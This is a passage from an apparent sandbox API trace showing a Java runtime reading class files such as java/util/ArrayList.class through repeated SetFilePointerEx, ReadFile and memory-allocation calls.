lpNewFilePointer=0x208c990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c990*=52226955) returned 1 [0092.526] ReadFile (in: hFile=0x134, lpBuffer=0x21053c0, nNumberOfBytesToRead=0x4a, lpNumberOfBytesRead=0x208c960, lpOverlapped=0x0 | out: lpBuffer=0x21053c0*, lpNumberOfBytesRead=0x208c960*=0x4a, lpOverlapped=0x0) returned 1 [0092.528] malloc (_Size=0x48) returned 0x121d9d50 [0092.528] malloc (_Size=0xa0) returned 0x121de990 [0092.528] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d879, lpNewFilePointer=0x208cdb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdb0*=54646905) returned 1 [0092.528] ReadFile (in: hFile=0x134, lpBuffer=0x121de990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd80, lpOverlapped=0x0 | out: lpBuffer=0x121de990*, lpNumberOfBytesRead=0x208cd80*=0xa0, lpOverlapped=0x0) returned 1 [0092.528] malloc (_Size=0x1d) returned 0x121d8060 [0092.528] free (_Block=0x121de990) [0092.528] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cddb7, lpNewFilePointer=0x208c9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9b0*=52223415) returned 1 [0092.528] ReadFile (in: hFile=0x134, lpBuffer=0x208ca00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c980, lpOverlapped=0x0 | out: lpBuffer=0x208ca00*, lpNumberOfBytesRead=0x208c980*=0x1e, lpOverlapped=0x0) returned 1 [0092.542] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cddf1, lpNewFilePointer=0x208ca10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca10*=52223473) returned 1 [0092.543] ReadFile (in: hFile=0x134, lpBuffer=0x21053c0, nNumberOfBytesToRead=0xd60, lpNumberOfBytesRead=0x208c9e0, lpOverlapped=0x0 | out: lpBuffer=0x21053c0*, lpNumberOfBytesRead=0x208c9e0*=0xd60, lpOverlapped=0x0) returned 1 [0092.543] malloc (_Size=0x48) returned 0x121d94e0 [0092.543] malloc (_Size=0xa0) returned 0x121de990 [0092.543] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d829, lpNewFilePointer=0x208c370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c370*=54646825) returned 1 [0092.543] ReadFile (in: hFile=0x134, lpBuffer=0x121de990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c340, lpOverlapped=0x0 | out: lpBuffer=0x121de990*, lpNumberOfBytesRead=0x208c340*=0xa0, lpOverlapped=0x0) returned 1 [0092.544] malloc (_Size=0x23) returned 0x121d7eb0 [0092.544] free (_Block=0x121de990) [0092.544] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ccff9, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=52219897) returned 1 [0092.544] ReadFile (in: hFile=0x134, lpBuffer=0x208bfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x208bfc0*, lpNumberOfBytesRead=0x208bf40*=0x1e, lpOverlapped=0x0) returned 1 [0092.545] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31cd039, lpNewFilePointer=0x208bfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfd0*=52219961) returned 1 [0092.545] ReadFile (in: hFile=0x134, lpBuffer=0x21062c0, nNumberOfBytesToRead=0xd7e, lpNumberOfBytesRead=0x208bfa0, lpOverlapped=0x0 | out: lpBuffer=0x21062c0*, lpNumberOfBytesRead=0x208bfa0*=0xd7e, lpOverlapped=0x0) returned 1 [0092.550] malloc (_Size=0x48) returned 0x121d9cb0 [0092.550] malloc (_Size=0xa0) returned 0x20fecf0 [0092.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d7e6, lpNewFilePointer=0x208d7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7f0*=54646758) returned 1 [0092.550] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7c0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208d7c0*=0xa0, lpOverlapped=0x0) returned 1 [0092.550] malloc (_Size=0x16) returned 0x121d70e0 [0092.551] free (_Block=0x20fecf0) [0092.551] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ccc29, lpNewFilePointer=0x208d3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3f0*=52218921) returned 1 [0092.551] ReadFile (in: hFile=0x134, lpBuffer=0x208d440, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3c0, lpOverlapped=0x0 | out: lpBuffer=0x208d440*, lpNumberOfBytesRead=0x208d3c0*=0x1e, lpOverlapped=0x0) returned 1 [0092.551] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31ccc5c, lpNewFilePointer=0x208d450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d450*=52218972) returned 1 [0092.551] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x39d, lpNumberOfBytesRead=0x208d420, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d420*=0x39d, lpOverlapped=0x0) returned 1 [0092.575] strlen (_Str="sun/reflect/ReflectionFactory.class") returned 0x23 [0092.576] malloc (_Size=0x48) returned 0x121d9990 [0092.576] malloc (_Size=0xa0) returned 0x20fecf0 [0092.576] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d795, lpNewFilePointer=0x208d3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d3e0*=54646677) returned 1 [0092.576] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d3b0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208d3b0*=0xa0, lpOverlapped=0x0) returned 1 [0092.576] malloc (_Size=0x24) returned 0x121d7ac0 [0092.576] free (_Block=0x20fecf0) [0092.577] strlen (_Str="sun/reflect/ReflectionFactory.class") returned 0x23 [0092.577] strcpy (in: _Dest=0x208d560, _Source="sun/reflect/ReflectionFactory.class" | out: _Dest="sun/reflect/ReflectionFactory.class") returned="sun/reflect/ReflectionFactory.class" [0092.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c9ec5, lpNewFilePointer=0x208cfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfe0*=52207301) returned 1 [0092.577] ReadFile (in: hFile=0x134, lpBuffer=0x208d030, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cfb0, lpOverlapped=0x0 | out: lpBuffer=0x208d030*, lpNumberOfBytesRead=0x208cfb0*=0x1e, lpOverlapped=0x0) returned 1 [0092.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c9f06, lpNewFilePointer=0x208d040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d040*=52207366) returned 1 [0092.577] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x2d23, lpNumberOfBytesRead=0x208d010, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208d010*=0x2d23, lpOverlapped=0x0) returned 1 [0092.578] free (_Block=0x121d70e0) [0092.578] free (_Block=0x121d9cb0) [0092.602] strlen (_Str="java/lang/ref/Reference$Lock.class") returned 0x22 [0092.602] malloc (_Size=0x48) returned 0x121d99e0 [0092.602] malloc (_Size=0xa0) returned 0x20fecf0 [0092.602] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d745, lpNewFilePointer=0x208e2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2e0*=54646597) returned 1 [0092.602] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2b0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208e2b0*=0xa0, lpOverlapped=0x0) returned 1 [0092.602] malloc (_Size=0x23) returned 0x121d7fd0 [0092.602] free (_Block=0x20fecf0) [0092.603] strlen (_Str="java/lang/ref/Reference$Lock.class") returned 0x22 [0092.603] strcpy (in: _Dest=0x208e460, _Source="java/lang/ref/Reference$Lock.class" | out: _Dest="java/lang/ref/Reference$Lock.class") returned="java/lang/ref/Reference$Lock.class" [0092.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c9d47, lpNewFilePointer=0x208dee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dee0*=52206919) returned 1 [0092.603] ReadFile (in: hFile=0x134, lpBuffer=0x208df30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208deb0, lpOverlapped=0x0 | out: lpBuffer=0x208df30*, lpNumberOfBytesRead=0x208deb0*=0x1e, lpOverlapped=0x0) returned 1 [0092.603] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c9d87, lpNewFilePointer=0x208df40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df40*=52206983) returned 1 [0092.603] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x13e, lpNumberOfBytesRead=0x208df10, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208df10*=0x13e, lpOverlapped=0x0) returned 1 [0092.604] free (_Block=0x121d7ac0) [0092.604] free (_Block=0x121d9990) [0092.615] strlen (_Str="java/lang/ref/Reference$ReferenceHandler.class") returned 0x2e [0092.615] malloc (_Size=0x48) returned 0x121d9df0 [0092.615] malloc (_Size=0xa0) returned 0x20fecf0 [0092.615] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d6e9, lpNewFilePointer=0x208e2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2e0*=54646505) returned 1 [0092.615] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2b0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208e2b0*=0xa0, lpOverlapped=0x0) returned 1 [0092.615] malloc (_Size=0x2f) returned 0x121da530 [0092.616] free (_Block=0x20fecf0) [0092.616] strlen (_Str="java/lang/ref/Reference$ReferenceHandler.class") returned 0x2e [0092.616] strcpy (in: _Dest=0x208e460, _Source="java/lang/ref/Reference$ReferenceHandler.class" | out: _Dest="java/lang/ref/Reference$ReferenceHandler.class") returned="java/lang/ref/Reference$ReferenceHandler.class" [0092.616] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c98ad, lpNewFilePointer=0x208dee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dee0*=52205741) returned 1 [0092.616] ReadFile (in: hFile=0x134, lpBuffer=0x208df30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208deb0, lpOverlapped=0x0 | out: lpBuffer=0x208df30*, lpNumberOfBytesRead=0x208deb0*=0x1e, lpOverlapped=0x0) returned 1 [0092.616] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c98f9, lpNewFilePointer=0x208df40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df40*=52205817) returned 1 [0092.616] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x44e, lpNumberOfBytesRead=0x208df10, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208df10*=0x44e, lpOverlapped=0x0) returned 1 [0092.617] free (_Block=0x121d7fd0) [0092.617] free (_Block=0x121d99e0) [0092.624] malloc (_Size=0x48) returned 0x121d9cb0 [0092.624] malloc (_Size=0xa0) returned 0x20fecf0 [0092.624] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34176c8, lpNewFilePointer=0x208dce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dce0*=54621896) returned 1 [0092.624] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcb0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208dcb0*=0xa0, lpOverlapped=0x0) returned 1 [0092.624] malloc (_Size=0x25) returned 0x121d7c40 [0092.625] free (_Block=0x20fecf0) [0092.625] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ba50d, lpNewFilePointer=0x208d8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8e0*=51094797) returned 1 [0092.625] ReadFile (in: hFile=0x134, lpBuffer=0x208d930, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8b0, lpOverlapped=0x0 | out: lpBuffer=0x208d930*, lpNumberOfBytesRead=0x208d8b0*=0x1e, lpOverlapped=0x0) returned 1 [0092.653] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30ba54f, lpNewFilePointer=0x208d940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d940*=51094863) returned 1 [0092.653] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x208d910, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208d910*=0x116, lpOverlapped=0x0) returned 1 [0092.656] strlen (_Str="java/lang/InterruptedException") returned 0x1e [0092.661] strlen (_Str="java/util/ArrayList.class") returned 0x19 [0092.661] malloc (_Size=0x48) returned 0x121d8ef0 [0092.661] malloc (_Size=0xa0) returned 0x20fecf0 [0092.662] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cd42, lpNewFilePointer=0x208d140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d140*=54644034) returned 1 [0092.662] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d110, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208d110*=0xa0, lpOverlapped=0x0) returned 1 [0092.662] malloc (_Size=0x1a) returned 0x121d7f40 [0092.662] free (_Block=0x20fecf0) [0092.662] strlen (_Str="java/util/ArrayList.class") returned 0x19 [0092.663] strcpy (in: _Dest=0x208d2c0, _Source="java/util/ArrayList.class" | out: _Dest="java/util/ArrayList.class") returned="java/util/ArrayList.class" [0092.663] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b0a52, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=52103762) returned 1 [0092.663] ReadFile (in: hFile=0x134, lpBuffer=0x208cd90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x208cd90*, lpNumberOfBytesRead=0x208cd10*=0x1e, lpOverlapped=0x0) returned 1 [0092.685] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b0a89, lpNewFilePointer=0x208cda0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cda0*=52103817) returned 1 [0092.685] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x259a, lpNumberOfBytesRead=0x208cd70, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cd70*=0x259a, lpOverlapped=0x0) returned 1 [0092.686] free (_Block=0x121d7c40) [0092.687] free (_Block=0x121d9cb0) [0092.704] strlen (_Str="java/util/Collections.class") returned 0x1b [0092.705] malloc (_Size=0x48) returned 0x121d9da0 [0092.705] malloc (_Size=0xa0) returned 0x20fecf0 [0092.705] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d35c, lpNewFilePointer=0x208ce80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce80*=54645596) returned 1 [0092.705] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce50, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208ce50*=0xa0, lpOverlapped=0x0) returned 1 [0092.705] malloc (_Size=0x1c) returned 0x121d7ac0 [0092.705] free (_Block=0x20fecf0) [0092.705] strlen (_Str="java/util/Collections.class") returned 0x1b [0092.706] strcpy (in: _Dest=0x208d000, _Source="java/util/Collections.class" | out: _Dest="java/util/Collections.class") returned="java/util/Collections.class" [0092.706] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bd913, lpNewFilePointer=0x208ca80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca80*=52156691) returned 1 [0092.706] ReadFile (in: hFile=0x134, lpBuffer=0x208cad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca50, lpOverlapped=0x0 | out: lpBuffer=0x208cad0*, lpNumberOfBytesRead=0x208ca50*=0x1e, lpOverlapped=0x0) returned 1 [0092.706] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bd94c, lpNewFilePointer=0x208cae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cae0*=52156748) returned 1 [0092.707] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x58d5, lpNumberOfBytesRead=0x208cab0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cab0*=0x58d5, lpOverlapped=0x0) returned 1 [0092.733] free (_Block=0x121d7f40) [0092.733] free (_Block=0x121d8ef0) [0092.745] malloc (_Size=0x48) returned 0x121d9c10 [0092.745] malloc (_Size=0xa0) returned 0x20fecf0 [0092.745] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d30a, lpNewFilePointer=0x208c800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c800*=54645514) returned 1 [0092.745] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7d0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208c7d0*=0xa0, lpOverlapped=0x0) returned 1 [0092.745] malloc (_Size=0x25) returned 0x121d8090 [0092.746] free (_Block=0x20fecf0) [0092.746] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bd1cc, lpNewFilePointer=0x208c400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c400*=52154828) returned 1 [0092.746] ReadFile (in: hFile=0x134, lpBuffer=0x208c450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3d0, lpOverlapped=0x0 | out: lpBuffer=0x208c450*, lpNumberOfBytesRead=0x208c3d0*=0x1e, lpOverlapped=0x0) returned 1 [0092.746] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bd20e, lpNewFilePointer=0x208c460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c460*=52154894) returned 1 [0092.746] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x705, lpNumberOfBytesRead=0x208c430, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c430*=0x705, lpOverlapped=0x0) returned 1 [0092.747] malloc (_Size=0x48) returned 0x121d9940 [0092.747] malloc (_Size=0xa0) returned 0x20fecf0 [0092.747] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d3e6, lpNewFilePointer=0x208bdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdc0*=54645734) returned 1 [0092.747] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd90, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208bd90*=0xa0, lpOverlapped=0x0) returned 1 [0092.747] malloc (_Size=0x1c) returned 0x121d7b50 [0092.748] free (_Block=0x20fecf0) [0092.748] strlen (_Str="java/util/AbstractSet.class") returned 0x1b [0092.748] strcpy (in: _Dest=0x208bf40, _Source="java/util/AbstractSet.class" | out: _Dest="java/util/AbstractSet.class") returned="java/util/AbstractSet.class" [0092.748] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c3644, lpNewFilePointer=0x208b9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9c0*=52180548) returned 1 [0092.748] ReadFile (in: hFile=0x134, lpBuffer=0x208ba10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b990, lpOverlapped=0x0 | out: lpBuffer=0x208ba10*, lpNumberOfBytesRead=0x208b990*=0x1e, lpOverlapped=0x0) returned 1 [0092.748] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c367d, lpNewFilePointer=0x208ba20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba20*=52180605) returned 1 [0092.748] ReadFile (in: hFile=0x134, lpBuffer=0x21032d0, nNumberOfBytesToRead=0x4c1, lpNumberOfBytesRead=0x208b9f0, lpOverlapped=0x0 | out: lpBuffer=0x21032d0*, lpNumberOfBytesRead=0x208b9f0*=0x4c1, lpOverlapped=0x0) returned 1 [0092.748] free (_Block=0x121d8090) [0092.749] free (_Block=0x121d9c10) [0092.750] strlen (_Str="java/util/Set.class") returned 0x13 [0092.750] malloc (_Size=0x48) returned 0x121d8fe0 [0092.750] malloc (_Size=0xa0) returned 0x20fecf0 [0092.750] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d3a5, lpNewFilePointer=0x208b300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b300*=54645669) returned 1 [0092.750] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2d0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208b2d0*=0xa0, lpOverlapped=0x0) returned 1 [0092.750] malloc (_Size=0x14) returned 0x121d7420 [0092.751] free (_Block=0x20fecf0) [0092.751] strlen (_Str="java/util/Set.class") returned 0x13 [0092.751] strcpy (in: _Dest=0x208b480, _Source="java/util/Set.class" | out: _Dest="java/util/Set.class") returned="java/util/Set.class" [0092.751] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c3221, lpNewFilePointer=0x208af00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af00*=52179489) returned 1 [0092.751] ReadFile (in: hFile=0x134, lpBuffer=0x208af50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208aed0, lpOverlapped=0x0 | out: lpBuffer=0x208af50*, lpNumberOfBytesRead=0x208aed0*=0x1e, lpOverlapped=0x0) returned 1 [0092.751] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c3252, lpNewFilePointer=0x208af60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af60*=52179538) returned 1 [0092.751] ReadFile (in: hFile=0x134, lpBuffer=0x2103910, nNumberOfBytesToRead=0x3f2, lpNumberOfBytesRead=0x208af30, lpOverlapped=0x0 | out: lpBuffer=0x2103910*, lpNumberOfBytesRead=0x208af30*=0x3f2, lpOverlapped=0x0) returned 1 [0092.751] free (_Block=0x121d7b50) [0092.752] free (_Block=0x121d9940) [0092.769] strlen (_Str="java/util/Collections$EmptyList.class") returned 0x25 [0092.769] malloc (_Size=0x48) returned 0x121d9080 [0092.769] malloc (_Size=0xa0) returned 0x20fecf0 [0092.769] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d2b7, lpNewFilePointer=0x208c800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c800*=54645431) returned 1 [0092.769] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7d0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208c7d0*=0xa0, lpOverlapped=0x0) returned 1 [0092.769] malloc (_Size=0x26) returned 0x121d7f40 [0092.769] free (_Block=0x20fecf0) [0092.770] strlen (_Str="java/util/Collections$EmptyList.class") returned 0x25 [0092.770] strcpy (in: _Dest=0x208c980, _Source="java/util/Collections$EmptyList.class" | out: _Dest="java/util/Collections$EmptyList.class") returned="java/util/Collections$EmptyList.class" [0092.770] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bc6c7, lpNewFilePointer=0x208c400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c400*=52152007) returned 1 [0092.770] ReadFile (in: hFile=0x134, lpBuffer=0x208c450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3d0, lpOverlapped=0x0 | out: lpBuffer=0x208c450*, lpNumberOfBytesRead=0x208c3d0*=0x1e, lpOverlapped=0x0) returned 1 [0092.771] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bc70a, lpNewFilePointer=0x208c460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c460*=52152074) returned 1 [0092.771] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xac2, lpNumberOfBytesRead=0x208c430, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c430*=0xac2, lpOverlapped=0x0) returned 1 [0092.771] free (_Block=0x121d7420) [0092.771] free (_Block=0x121d8fe0) [0092.784] malloc (_Size=0x48) returned 0x121d9b20 [0092.784] malloc (_Size=0xa0) returned 0x20fecf0 [0092.784] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d265, lpNewFilePointer=0x208c800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c800*=54645349) returned 1 [0092.784] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c7d0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208c7d0*=0xa0, lpOverlapped=0x0) returned 1 [0092.784] malloc (_Size=0x25) returned 0x121d7ac0 [0092.784] free (_Block=0x20fecf0) [0092.785] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bbb20, lpNewFilePointer=0x208c400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c400*=52149024) returned 1 [0092.785] ReadFile (in: hFile=0x134, lpBuffer=0x208c450, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c3d0, lpOverlapped=0x0 | out: lpBuffer=0x208c450*, lpNumberOfBytesRead=0x208c3d0*=0x1e, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bbb62, lpNewFilePointer=0x208c460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c460*=52149090) returned 1 [0092.786] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xb65, lpNumberOfBytesRead=0x208c430, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c430*=0xb65, lpOverlapped=0x0) returned 1 [0092.787] free (_Block=0x121d7f40) [0092.787] free (_Block=0x121d9080) [0092.794] strlen (_Str="java/util/AbstractMap.class") returned 0x1b [0092.794] malloc (_Size=0x48) returned 0x121d9350 [0092.794] malloc (_Size=0xa0) returned 0x20fecf0 [0092.794] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d21c, lpNewFilePointer=0x208bdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdc0*=54645276) returned 1 [0092.795] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd90, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208bd90*=0xa0, lpOverlapped=0x0) returned 1 [0092.795] malloc (_Size=0x1c) returned 0x121d7e20 [0092.795] free (_Block=0x20fecf0) [0092.795] strlen (_Str="java/util/AbstractMap.class") returned 0x1b [0092.795] strcpy (in: _Dest=0x208bf40, _Source="java/util/AbstractMap.class" | out: _Dest="java/util/AbstractMap.class") returned="java/util/AbstractMap.class" [0092.795] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31babcf, lpNewFilePointer=0x208b9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9c0*=52145103) returned 1 [0092.795] ReadFile (in: hFile=0x134, lpBuffer=0x208ba10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b990, lpOverlapped=0x0 | out: lpBuffer=0x208ba10*, lpNumberOfBytesRead=0x208b990*=0x1e, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31bac08, lpNewFilePointer=0x208ba20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba20*=52145160) returned 1 [0092.796] ReadFile (in: hFile=0x134, lpBuffer=0x2103730, nNumberOfBytesToRead=0xf18, lpNumberOfBytesRead=0x208b9f0, lpOverlapped=0x0 | out: lpBuffer=0x2103730*, lpNumberOfBytesRead=0x208b9f0*=0xf18, lpOverlapped=0x0) returned 1 [0092.797] free (_Block=0x121d7ac0) [0092.797] free (_Block=0x121d9b20) [0092.814] strlen (_Str="java/util/Collections$UnmodifiableRandomAccessList.class") returned 0x38 [0092.814] malloc (_Size=0x48) returned 0x121d9170 [0092.814] malloc (_Size=0xa0) returned 0x20fecf0 [0092.814] SetFilePointerEx (in: hFile=0x134, 